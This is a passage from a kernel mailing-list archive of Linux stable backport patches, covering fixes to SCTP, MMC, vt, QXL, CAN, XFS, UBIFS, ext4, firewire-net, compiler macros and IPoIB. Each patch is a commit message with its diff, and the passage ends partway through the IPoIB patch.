diff --git a/net/sctp/sm_statefuns.c b/net/sctp/sm_statefuns.c
index d9cbecb..df938b2 100644
--- a/net/sctp/sm_statefuns.c
+++ b/net/sctp/sm_statefuns.c
@@ -3428,6 +3428,12 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
commands);

+ /* Report violation if chunk len overflows */
+ ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
+ if (ch_end > skb_tail_pointer(skb))
+ return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
+ commands);
+
/* Now that we know we at least have a chunk header,
* do things that are type appropriate.
*/
@@ -3459,12 +3465,6 @@ sctp_disposition_t sctp_sf_ootb(struct net *net,
}
}

- /* Report violation if chunk len overflows */
- ch_end = ((__u8 *)ch) + WORD_ROUND(ntohs(ch->length));
- if (ch_end > skb_tail_pointer(skb))
- return sctp_sf_violation_chunklen(net, ep, asoc, type, arg,
- commands);
-
ch = (sctp_chunkhdr_t *) ch_end;
} while (ch_end < skb_tail_pointer(skb));
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Daniel Glöckner <***@emlix.com>

commit 0ed50abb2d8fc81570b53af25621dad560cd49b3 upstream.

CMD23 aka SET_BLOCK_COUNT was introduced with MMC v3.1.
Older versions of the specification allowed to terminate
multi-block transfers only with CMD12.

The patch fixes the following problem:

mmc0: new MMC card at address 0001
mmcblk0: mmc0:0001 SDMB-16 15.3 MiB
mmcblk0: timed out sending SET_BLOCK_COUNT command, card status 0x400900
...
blk_update_request: I/O error, dev mmcblk0, sector 0
Buffer I/O error on dev mmcblk0, logical block 0, async page read
mmcblk0: unable to read partition table

Signed-off-by: Daniel Glöckner <***@emlix.com>
Signed-off-by: Ulf Hansson <***@linaro.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/mmc/card/block.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/drivers/mmc/card/block.c b/drivers/mmc/card/block.c
index a2863b7..ce34c49 100644
--- a/drivers/mmc/card/block.c
+++ b/drivers/mmc/card/block.c
@@ -2093,7 +2093,8 @@ static struct mmc_blk_data *mmc_blk_alloc_req(struct mmc_card *card,
set_capacity(md->disk, size);

if (mmc_host_cmd23(card->host)) {
- if (mmc_card_mmc(card) ||
+ if ((mmc_card_mmc(card) &&
+ card->csd.mmca_vsn >= CSD_SPEC_VER_3) ||
(mmc_card_sd(card) &&
card->scr.cmds & SD_SCR_CMD23_SUPPORT))
md->flags |= MMC_BLK_CMD23;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:02 UTC
Permalink
From: Scot Doyle <***@scotdoyle.com>

commit 009e39ae44f4191188aeb6dfbf661b771dbbe515 upstream.

When resizing a vt its selection may exceed the new size, resulting in
an invalid memory access [1]. Clear the selection before resizing.

[1] http://lkml.kernel.org/r/CACT4Y+acDTwy4umEvf5ROBGiRJNrxHN4Cn5szCXE5Jw-d1B=***@mail.gmail.com

Reported-and-tested-by: Dmitry Vyukov <***@google.com>
Signed-off-by: Scot Doyle <***@scotdoyle.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/tty/vt/vt.c | 3 +++
1 file changed, 3 insertions(+)

diff --git a/drivers/tty/vt/vt.c b/drivers/tty/vt/vt.c
index 5deddca..010ec70 100644
--- a/drivers/tty/vt/vt.c
+++ b/drivers/tty/vt/vt.c
@@ -869,6 +869,9 @@ static int vc_do_resize(struct tty_struct *tty, struct vc_data *vc,
if (!newscreen)
return -ENOMEM;

+ if (vc == sel_cons)
+ clear_selection();
+
old_rows = vc->vc_rows;
old_row_size = vc->vc_size_row;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Dan Carpenter <***@oracle.com>

commit f4cceb2affcd1285d4ce498089e8a79f4cd2fa66 upstream.

If kmap fails, it leads to memory corruption.

Fixes: f64122c1f6ad ('drm: add new QXL driver. (v1.4)')
Signed-off-by: Dan Carpenter <***@oracle.com>
Signed-off-by: Daniel Vetter <***@ffwll.ch>
Link: http://patchwork.freedesktop.org/patch/msgid/***@mwanda
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/gpu/drm/qxl/qxl_draw.c | 2 ++
1 file changed, 2 insertions(+)

diff --git a/drivers/gpu/drm/qxl/qxl_draw.c b/drivers/gpu/drm/qxl/qxl_draw.c
index 3c8c3db..ff32052 100644
--- a/drivers/gpu/drm/qxl/qxl_draw.c
+++ b/drivers/gpu/drm/qxl/qxl_draw.c
@@ -114,6 +114,8 @@ static int qxl_palette_create_1bit(struct qxl_bo **palette_bo,
palette_bo);

ret = qxl_bo_kmap(*palette_bo, (void **)&pal);
+ if (ret)
+ return ret;
pal->num_ents = 2;
pal->unique = unique++;
if (visual == FB_VISUAL_TRUECOLOR || visual == FB_VISUAL_DIRECTCOLOR) {
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Oliver Hartkopp <***@hartkopp.net>

commit deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.

Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().

Reference: http://marc.info/?l=linux-netdev&m=147732648731237

Reported-by: Andrey Konovalov <***@google.com>
Suggested-by: Cong Wang <***@gmail.com>
Signed-off-by: Oliver Hartkopp <***@hartkopp.net>
Acked-by: Cong Wang <***@gmail.com>
Tested-by: Andrey Konovalov <***@google.com>
Signed-off-by: Marc Kleine-Budde <***@pengutronix.de>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
net/can/bcm.c | 32 +++++++++++++++++++++++---------
1 file changed, 23 insertions(+), 9 deletions(-)

diff --git a/net/can/bcm.c b/net/can/bcm.c
index 35cf02d..dd0781c 100644
--- a/net/can/bcm.c
+++ b/net/can/bcm.c
@@ -1500,24 +1500,31 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
struct sockaddr_can *addr = (struct sockaddr_can *)uaddr;
struct sock *sk = sock->sk;
struct bcm_sock *bo = bcm_sk(sk);
+ int ret = 0;

if (len < sizeof(*addr))
return -EINVAL;

- if (bo->bound)
- return -EISCONN;
+ lock_sock(sk);
+
+ if (bo->bound) {
+ ret = -EISCONN;
+ goto fail;
+ }

/* bind a device to this socket */
if (addr->can_ifindex) {
struct net_device *dev;

dev = dev_get_by_index(&init_net, addr->can_ifindex);
- if (!dev)
- return -ENODEV;
-
+ if (!dev) {
+ ret = -ENODEV;
+ goto fail;
+ }
if (dev->type != ARPHRD_CAN) {
dev_put(dev);
- return -ENODEV;
+ ret = -ENODEV;
+ goto fail;
}

bo->ifindex = dev->ifindex;
@@ -1528,17 +1535,24 @@ static int bcm_connect(struct socket *sock, struct sockaddr *uaddr, int len,
bo->ifindex = 0;
}

- bo->bound = 1;
-
if (proc_dir) {
/* unique socket address as filename */
sprintf(bo->procname, "%lu", sock_i_ino(sk));
bo->bcm_proc_read = proc_create_data(bo->procname, 0644,
proc_dir,
&bcm_proc_fops, sk);
+ if (!bo->bcm_proc_read) {
+ ret = -ENOMEM;
+ goto fail;
+ }
}

- return 0;
+ bo->bound = 1;
+
+fail:
+ release_sock(sk);
+
+ return ret;
}

static int bcm_recvmsg(struct kiocb *iocb, struct socket *sock,
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: "Darrick J. Wong" <***@oracle.com>

commit 58d789678546d46d7bbd809dd7dab417c0f23655 upstream.

The function xfs_calc_dquots_per_chunk takes a parameter in units
of basic blocks. The kernel seems to get the units wrong, but
userspace got 'fixed' by commenting out the unnecessary conversion.
Fix both.

Signed-off-by: Darrick J. Wong <***@oracle.com>
Reviewed-by: Eric Sandeen <***@redhat.com>
Signed-off-by: Dave Chinner <***@fromorbit.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/xfs/xfs_dquot.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/fs/xfs/xfs_dquot.c b/fs/xfs/xfs_dquot.c
index bac3e16..e59f309 100644
--- a/fs/xfs/xfs_dquot.c
+++ b/fs/xfs/xfs_dquot.c
@@ -309,8 +309,7 @@ xfs_dquot_buf_verify_crc(
if (mp->m_quotainfo)
ndquots = mp->m_quotainfo->qi_dqperchunk;
else
- ndquots = xfs_qm_calc_dquots_per_chunk(mp,
- XFS_BB_TO_FSB(mp, bp->b_length));
+ ndquots = xfs_qm_calc_dquots_per_chunk(mp, bp->b_length);

for (i = 0; i < ndquots; i++, d++) {
if (!xfs_verify_cksum((char *)d, sizeof(struct xfs_dqblk),
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Fabio Estevam <***@nxp.com>

commit f91346e8b5f46aaf12f1df26e87140584ffd1b3f upstream.

An interrupt may occur right after devm_request_irq() is called and
prior to the spinlock initialization, leading to a kernel oops,
as the interrupt handler uses the spinlock.

In order to prevent this problem, move the spinlock initialization
prior to requesting the interrupts.

Fixes: e4243f13d10e (mmc: mxs-mmc: add mmc host driver for i.MX23/28)
Signed-off-by: Fabio Estevam <***@nxp.com>
Reviewed-by: Marek Vasut <***@denx.de>
Signed-off-by: Ulf Hansson <***@linaro.org>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/mmc/host/mxs-mmc.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/mmc/host/mxs-mmc.c b/drivers/mmc/host/mxs-mmc.c
index 4278a17..f3a4232 100644
--- a/drivers/mmc/host/mxs-mmc.c
+++ b/drivers/mmc/host/mxs-mmc.c
@@ -674,13 +674,13 @@ static int mxs_mmc_probe(struct platform_device *pdev)

platform_set_drvdata(pdev, mmc);

+ spin_lock_init(&host->lock);
+
ret = devm_request_irq(&pdev->dev, irq_err, mxs_mmc_irq_handler, 0,
DRIVER_NAME, host);
if (ret)
goto out_free_dma;

- spin_lock_init(&host->lock);
-
ret = mmc_add_host(mmc);
if (ret)
goto out_free_dma;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Vincent Stehlé <***@intel.com>

commit c0082e985fdf77b02fc9e0dac3b58504dcf11b7a upstream.

An assertion in layout_in_gaps() verifies that the gap_lebs pointer is
below the maximum bound. When computing this maximum bound the idx_lebs
count is multiplied by sizeof(int), while C pointers arithmetic does take
into account the size of the pointed elements implicitly already. Remove
the multiplication to fix the assertion.

Fixes: 1e51764a3c2ac05a ("UBIFS: add new flash file system")
Signed-off-by: Vincent Stehlé <***@intel.com>
Cc: Artem Bityutskiy <***@linux.intel.com>
Signed-off-by: Artem Bityutskiy <***@linux.intel.com>
Signed-off-by: Richard Weinberger <***@nod.at>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/ubifs/tnc_commit.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/fs/ubifs/tnc_commit.c b/fs/ubifs/tnc_commit.c
index 52a6559..3f620c0 100644
--- a/fs/ubifs/tnc_commit.c
+++ b/fs/ubifs/tnc_commit.c
@@ -370,7 +370,7 @@ static int layout_in_gaps(struct ubifs_info *c, int cnt)

p = c->gap_lebs;
do {
- ubifs_assert(p < c->gap_lebs + sizeof(int) * c->lst.idx_lebs);
+ ubifs_assert(p < c->gap_lebs + c->lst.idx_lebs);
written = layout_leb_in_gaps(c, p);
if (written < 0) {
err = written;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Konstantin Khlebnikov <***@yandex-team.ru>

commit adb7ef600cc9d9d15ecc934cc26af5c1379777df upstream.

This might be unexpected but pages allocated for sbi->s_buddy_cache are
charged to current memory cgroup. So, GFP_NOFS allocation could fail if
current task has been killed by OOM or if current memory cgroup has no
free memory left. Block allocator cannot handle such failures here yet.

Signed-off-by: Konstantin Khlebnikov <***@yandex-team.ru>
Signed-off-by: Theodore Ts'o <***@mit.edu>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/ext4/mballoc.c | 47 ++++++++++++++++++++++++++++-------------------
1 file changed, 28 insertions(+), 19 deletions(-)

diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
index 08b4495..cb9eec0 100644
--- a/fs/ext4/mballoc.c
+++ b/fs/ext4/mballoc.c
@@ -808,7 +808,7 @@ static void mb_regenerate_buddy(struct ext4_buddy *e4b)
* for this page; do not hold this lock when calling this routine!
*/

-static int ext4_mb_init_cache(struct page *page, char *incore)
+static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
{
ext4_group_t ngroups;
int blocksize;
@@ -841,7 +841,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore)
/* allocate buffer_heads to read bitmaps */
if (groups_per_page > 1) {
i = sizeof(struct buffer_head *) * groups_per_page;
- bh = kzalloc(i, GFP_NOFS);
+ bh = kzalloc(i, gfp);
if (bh == NULL) {
err = -ENOMEM;
goto out;
@@ -966,7 +966,7 @@ out:
* are on the same page e4b->bd_buddy_page is NULL and return value is 0.
*/
static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
- ext4_group_t group, struct ext4_buddy *e4b)
+ ext4_group_t group, struct ext4_buddy *e4b, gfp_t gfp)
{
struct inode *inode = EXT4_SB(sb)->s_buddy_cache;
int block, pnum, poff;
@@ -985,7 +985,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,
block = group * 2;
pnum = block / blocks_per_page;
poff = block % blocks_per_page;
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (!page)
return -EIO;
BUG_ON(page->mapping != inode->i_mapping);
@@ -999,7 +999,7 @@ static int ext4_mb_get_buddy_page_lock(struct super_block *sb,

block++;
pnum = block / blocks_per_page;
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (!page)
return -EIO;
BUG_ON(page->mapping != inode->i_mapping);
@@ -1025,7 +1025,7 @@ static void ext4_mb_put_buddy_page_lock(struct ext4_buddy *e4b)
* calling this routine!
*/
static noinline_for_stack
-int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
+int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp)
{

struct ext4_group_info *this_grp;
@@ -1043,7 +1043,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
* have taken a reference using ext4_mb_load_buddy and that
* would have pinned buddy page to page cache.
*/
- ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b);
+ ret = ext4_mb_get_buddy_page_lock(sb, group, &e4b, gfp);
if (ret || !EXT4_MB_GRP_NEED_INIT(this_grp)) {
/*
* somebody initialized the group
@@ -1053,7 +1053,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
}

page = e4b.bd_bitmap_page;
- ret = ext4_mb_init_cache(page, NULL);
+ ret = ext4_mb_init_cache(page, NULL, gfp);
if (ret)
goto err;
if (!PageUptodate(page)) {
@@ -1073,7 +1073,7 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group)
}
/* init buddy cache */
page = e4b.bd_buddy_page;
- ret = ext4_mb_init_cache(page, e4b.bd_bitmap);
+ ret = ext4_mb_init_cache(page, e4b.bd_bitmap, gfp);
if (ret)
goto err;
if (!PageUptodate(page)) {
@@ -1092,8 +1092,8 @@ err:
* calling this routine!
*/
static noinline_for_stack int
-ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
- struct ext4_buddy *e4b)
+ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group,
+ struct ext4_buddy *e4b, gfp_t gfp)
{
int blocks_per_page;
int block;
@@ -1123,7 +1123,7 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
* we need full data about the group
* to make a good selection
*/
- ret = ext4_mb_init_group(sb, group);
+ ret = ext4_mb_init_group(sb, group, gfp);
if (ret)
return ret;
}
@@ -1151,11 +1151,11 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
* wait for it to initialize.
*/
page_cache_release(page);
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (page) {
BUG_ON(page->mapping != inode->i_mapping);
if (!PageUptodate(page)) {
- ret = ext4_mb_init_cache(page, NULL);
+ ret = ext4_mb_init_cache(page, NULL, gfp);
if (ret) {
unlock_page(page);
goto err;
@@ -1182,11 +1182,12 @@ ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
if (page == NULL || !PageUptodate(page)) {
if (page)
page_cache_release(page);
- page = find_or_create_page(inode->i_mapping, pnum, GFP_NOFS);
+ page = find_or_create_page(inode->i_mapping, pnum, gfp);
if (page) {
BUG_ON(page->mapping != inode->i_mapping);
if (!PageUptodate(page)) {
- ret = ext4_mb_init_cache(page, e4b->bd_bitmap);
+ ret = ext4_mb_init_cache(page, e4b->bd_bitmap,
+ gfp);
if (ret) {
unlock_page(page);
goto err;
@@ -1220,6 +1221,12 @@ err:
return ret;
}

+static int ext4_mb_load_buddy(struct super_block *sb, ext4_group_t group,
+ struct ext4_buddy *e4b)
+{
+ return ext4_mb_load_buddy_gfp(sb, group, e4b, GFP_NOFS);
+}
+
static void ext4_mb_unload_buddy(struct ext4_buddy *e4b)
{
if (e4b->bd_bitmap_page)
@@ -1993,7 +2000,7 @@ static int ext4_mb_good_group(struct ext4_allocation_context *ac,

/* We only do this if the grp has never been initialized */
if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
- int ret = ext4_mb_init_group(ac->ac_sb, group);
+ int ret = ext4_mb_init_group(ac->ac_sb, group, GFP_NOFS);
if (ret)
return 0;
}
@@ -4748,7 +4755,9 @@ do_more:
#endif
trace_ext4_mballoc_free(sb, inode, block_group, bit, count_clusters);

- err = ext4_mb_load_buddy(sb, block_group, &e4b);
+ /* __GFP_NOFAIL: retry infinitely, ignore TIF_MEMDIE and memcg limit. */
+ err = ext4_mb_load_buddy_gfp(sb, block_group, &e4b,
+ GFP_NOFS|__GFP_NOFAIL);
if (err)
goto error_return;

@@ -5159,7 +5168,7 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
grp = ext4_get_group_info(sb, group);
/* We only do this if the grp has never been initialized */
if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
- ret = ext4_mb_init_group(sb, group);
+ ret = ext4_mb_init_group(sb, group, GFP_NOFS);
if (ret)
break;
}
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Stefan Richter <***@s5r6.in-berlin.de>

commit e9300a4b7bbae83af1f7703938c94cf6dc6d308f upstream.

RFC 2734 defines the datagram_size field in fragment encapsulation
headers thus:

datagram_size: The encoded size of the entire IP datagram. The
value of datagram_size [...] SHALL be one less than the value of
Total Length in the datagram's IP header (see STD 5, RFC 791).

Accordingly, the eth1394 driver of Linux 2.6.36 and older set and got
this field with a -/+1 offset:

ether1394_tx() /* transmit */
ether1394_encapsulate_prep()
hdr->ff.dg_size = dg_size - 1;

ether1394_data_handler() /* receive */
if (hdr->common.lf == ETH1394_HDR_LF_FF)
dg_size = hdr->ff.dg_size + 1;
else
dg_size = hdr->sf.dg_size + 1;

Likewise, I observe OS X 10.4 and Windows XP Pro SP3 to transmit 1500
byte sized datagrams in fragments with datagram_size=1499 if link
fragmentation is required.

Only firewire-net sets and gets datagram_size without this offset. The
result is lacking interoperability of firewire-net with OS X, Windows
XP, and presumably Linux' eth1394. (I did not test with the latter.)
For example, FTP data transfers to a Linux firewire-net box with max_rec
smaller than the 1500 bytes MTU
- from OS X fail entirely,
- from Win XP start out with a bunch of fragmented datagrams which
time out, then continue with unfragmented datagrams because Win XP
temporarily reduces the MTU to 576 bytes.

So let's fix firewire-net's datagram_size accessors.

Note that firewire-net thereby loses interoperability with unpatched
firewire-net, but only if link fragmentation is employed. (This happens
with large broadcast datagrams, and with large datagrams on several
FireWire CardBus cards with smaller max_rec than equivalent PCI cards,
and it can be worked around by setting a small enough MTU.)

Signed-off-by: Stefan Richter <***@s5r6.in-berlin.de>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/firewire/net.c | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/drivers/firewire/net.c b/drivers/firewire/net.c
index 70a716e..1321319 100644
--- a/drivers/firewire/net.c
+++ b/drivers/firewire/net.c
@@ -73,13 +73,13 @@ struct rfc2734_header {

#define fwnet_get_hdr_lf(h) (((h)->w0 & 0xc0000000) >> 30)
#define fwnet_get_hdr_ether_type(h) (((h)->w0 & 0x0000ffff))
-#define fwnet_get_hdr_dg_size(h) (((h)->w0 & 0x0fff0000) >> 16)
+#define fwnet_get_hdr_dg_size(h) ((((h)->w0 & 0x0fff0000) >> 16) + 1)
#define fwnet_get_hdr_fg_off(h) (((h)->w0 & 0x00000fff))
#define fwnet_get_hdr_dgl(h) (((h)->w1 & 0xffff0000) >> 16)

-#define fwnet_set_hdr_lf(lf) ((lf) << 30)
+#define fwnet_set_hdr_lf(lf) ((lf) << 30)
#define fwnet_set_hdr_ether_type(et) (et)
-#define fwnet_set_hdr_dg_size(dgs) ((dgs) << 16)
+#define fwnet_set_hdr_dg_size(dgs) (((dgs) - 1) << 16)
#define fwnet_set_hdr_fg_off(fgo) (fgo)

#define fwnet_set_hdr_dgl(dgl) ((dgl) << 16)
@@ -635,7 +635,7 @@ static int fwnet_incoming_packet(struct fwnet_device *dev, __be32 *buf, int len,
fg_off = fwnet_get_hdr_fg_off(&hdr);
}
datagram_label = fwnet_get_hdr_dgl(&hdr);
- dg_size = fwnet_get_hdr_dg_size(&hdr); /* ??? + 1 */
+ dg_size = fwnet_get_hdr_dg_size(&hdr);

if (fg_off + len > dg_size)
return 0;
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Daeho Jeong <***@samsung.com>

commit 93e3b4e6631d2a74a8cf7429138096862ff9f452 upstream.

Now, ext4_do_update_inode() clears high 16-bit fields of uid/gid
of deleted and evicted inode to fix up interoperability with old
kernels. However, it checks only i_dtime of an inode to determine
whether the inode was deleted and evicted, and this is very risky,
because i_dtime can be used for the pointer maintaining orphan inode
list, too. We need to further check whether the i_dtime is being
used for the orphan inode list even if the i_dtime is not NULL.

We found that high 16-bit fields of uid/gid of inode are unintentionally
and permanently cleared when the inode truncation is just triggered,
but not finished, and the inode metadata, whose high uid/gid bits are
cleared, is written on disk, and the sudden power-off follows that
in order.

Signed-off-by: Daeho Jeong <***@samsung.com>
Signed-off-by: Hobin Woo <***@samsung.com>
Signed-off-by: Theodore Ts'o <***@mit.edu>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
fs/ext4/inode.c | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
index 046e0e1..a187055 100644
--- a/fs/ext4/inode.c
+++ b/fs/ext4/inode.c
@@ -4480,14 +4480,14 @@ static int ext4_do_update_inode(handle_t *handle,
* Fix up interoperability with old kernels. Otherwise, old inodes get
* re-used with the upper 16 bits of the uid/gid intact
*/
- if (!ei->i_dtime) {
+ if (ei->i_dtime && list_empty(&ei->i_orphan)) {
+ raw_inode->i_uid_high = 0;
+ raw_inode->i_gid_high = 0;
+ } else {
raw_inode->i_uid_high =
cpu_to_le16(high_16_bits(i_uid));
raw_inode->i_gid_high =
cpu_to_le16(high_16_bits(i_gid));
- } else {
- raw_inode->i_uid_high = 0;
- raw_inode->i_gid_high = 0;
}
} else {
raw_inode->i_uid_low = cpu_to_le16(fs_high2lowuid(i_uid));
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Christian Borntraeger <***@de.ibm.com>

commit 230fa253df6352af12ad0a16128760b5cb3f92df upstream.

ACCESS_ONCE does not work reliably on non-scalar types. For
example gcc 4.6 and 4.7 might remove the volatile tag for such
accesses during the SRA (scalar replacement of aggregates) step
https://gcc.gnu.org/bugzilla/show_bug.cgi?id=58145)

Let's provide READ_ONCE/ASSIGN_ONCE that will do all accesses via
scalar types as suggested by Linus Torvalds. Accesses larger than
the machines word size cannot be guaranteed to be atomic. These
macros will use memcpy and emit a build warning.

Signed-off-by: Christian Borntraeger <***@de.ibm.com>
[wt: backported only for next patch]

Signed-off-by: Willy Tarreau <***@1wt.eu>
---
include/linux/compiler.h | 74 ++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 74 insertions(+)

diff --git a/include/linux/compiler.h b/include/linux/compiler.h
index 6977192..9df1978 100644
--- a/include/linux/compiler.h
+++ b/include/linux/compiler.h
@@ -179,6 +179,80 @@ void ftrace_likely_update(struct ftrace_branch_data *f, int val, int expect);
# define __UNIQUE_ID(prefix) __PASTE(__PASTE(__UNIQUE_ID_, prefix), __LINE__)
#endif

+#include <uapi/linux/types.h>
+
+static __always_inline void data_access_exceeds_word_size(void)
+#ifdef __compiletime_warning
+__compiletime_warning("data access exceeds word size and won't be atomic")
+#endif
+;
+
+static __always_inline void data_access_exceeds_word_size(void)
+{
+}
+
+static __always_inline void __read_once_size(volatile void *p, void *res, int size)
+{
+ switch (size) {
+ case 1: *(__u8 *)res = *(volatile __u8 *)p; break;
+ case 2: *(__u16 *)res = *(volatile __u16 *)p; break;
+ case 4: *(__u32 *)res = *(volatile __u32 *)p; break;
+#ifdef CONFIG_64BIT
+ case 8: *(__u64 *)res = *(volatile __u64 *)p; break;
+#endif
+ default:
+ barrier();
+ __builtin_memcpy((void *)res, (const void *)p, size);
+ data_access_exceeds_word_size();
+ barrier();
+ }
+}
+
+static __always_inline void __assign_once_size(volatile void *p, void *res, int size)
+{
+ switch (size) {
+ case 1: *(volatile __u8 *)p = *(__u8 *)res; break;
+ case 2: *(volatile __u16 *)p = *(__u16 *)res; break;
+ case 4: *(volatile __u32 *)p = *(__u32 *)res; break;
+#ifdef CONFIG_64BIT
+ case 8: *(volatile __u64 *)p = *(__u64 *)res; break;
+#endif
+ default:
+ barrier();
+ __builtin_memcpy((void *)p, (const void *)res, size);
+ data_access_exceeds_word_size();
+ barrier();
+ }
+}
+
+/*
+ * Prevent the compiler from merging or refetching reads or writes. The
+ * compiler is also forbidden from reordering successive instances of
+ * READ_ONCE, ASSIGN_ONCE and ACCESS_ONCE (see below), but only when the
+ * compiler is aware of some particular ordering. One way to make the
+ * compiler aware of ordering is to put the two invocations of READ_ONCE,
+ * ASSIGN_ONCE or ACCESS_ONCE() in different C statements.
+ *
+ * In contrast to ACCESS_ONCE these two macros will also work on aggregate
+ * data types like structs or unions. If the size of the accessed data
+ * type exceeds the word size of the machine (e.g., 32 bits or 64 bits)
+ * READ_ONCE() and ASSIGN_ONCE() will fall back to memcpy and print a
+ * compile-time warning.
+ *
+ * Their two major use cases are: (1) Mediating communication between
+ * process-level code and irq/NMI handlers, all running on the same CPU,
+ * and (2) Ensuring that the compiler does not fold, spindle, or otherwise
+ * mutilate accesses that either do not require ordering or that interact
+ * with an explicit memory barrier or atomic instruction that provides the
+ * required ordering.
+ */
+
+#define READ_ONCE(x) \
+ ({ typeof(x) __val; __read_once_size(&x, &__val, sizeof(__val)); __val; })
+
+#define ASSIGN_ONCE(val, x) \
+ ({ typeof(x) __val; __val = val; __assign_once_size(&x, &__val, sizeof(__val)); __val; })
+
#endif /* __KERNEL__ */

#endif /* __ASSEMBLY__ */
--
2.8.0.rc2.1.gbe9624a
Willy Tarreau
2017-02-05 19:40:03 UTC
Permalink
From: Erez Shitrit <***@mellanox.com>

commit 546481c2816ea3c061ee9d5658eb48070f69212e upstream.

When a new CM connection is being requested, ipoib driver copies data
from the path pointer in the CM/tx object, the path object might be
invalid at the point and memory corruption will happened later when now
the CM driver will try using that data.

The next scenario demonstrates it:
neigh_add_path --> ipoib_cm_create_tx -->
queue_work (pointer to path is in the cm/tx struct)
#while the work is still in the queue,
#the port goes down and causes the ipoib_flush_paths:
ipoib_flush_paths --> path_free --> kfree(path)
#at this point the work scheduled starts.
ipoib_cm_tx_start --> copy from the (invalid)path pointer:
(memcpy(&pathrec, &p->path->pathrec, sizeof pathrec);)
-> memory corruption.

To fix that the driver now starts the CM/tx connection only if that
specific path exists in the general paths database.
This check is protected with the relevant locks, and uses the gid from
the neigh member in the CM/tx object which is valid according to the ref
count that was taken by the CM/tx.

Fixes: 839fcaba35 ('IPoIB: Connected mode experimental support')
Signed-off-by: Erez Shitrit <***@mellanox.com>
Signed-off-by: Leon Romanovsky <***@kernel.org>
Signed-off-by: Doug Ledford <***@redhat.com>
Signed-off-by: Willy Tarreau <***@1wt.eu>
---
drivers/infiniband/ulp/ipoib/ipoib.h | 1 +
drivers/infiniband/ulp/ipoib/ipoib_cm.c | 16 ++++++++++++++++
drivers/infiniband/ulp/ipoib/ipoib_main.c | 2 +-
3 files changed, 18 insertions(+), 1 deletion(-)

diff --git a/drivers/infiniband/ulp/ipoib/ipoib.h b/drivers/infiniband/ulp/ipoib/ipoib.h
index eb71aaa..fb9a7b3 100644
--- a/drivers/infiniband/ulp/ipoib/ipoib.h
+++ b/drivers/infiniband/ulp/ipoib/ipoib.h
@@ -460,6 +460,7 @@ void ipoib_send(struct net_device *dev, struct sk_buff *skb,
struct ipoib_ah *address, u32 qpn);
void ipoib_reap_ah(struct work_struct *work);

+struct ipoib_path *__path_find(struct net_device *dev, void *gid);
void ipoib_mark_paths_invalid(struct net_device *dev);
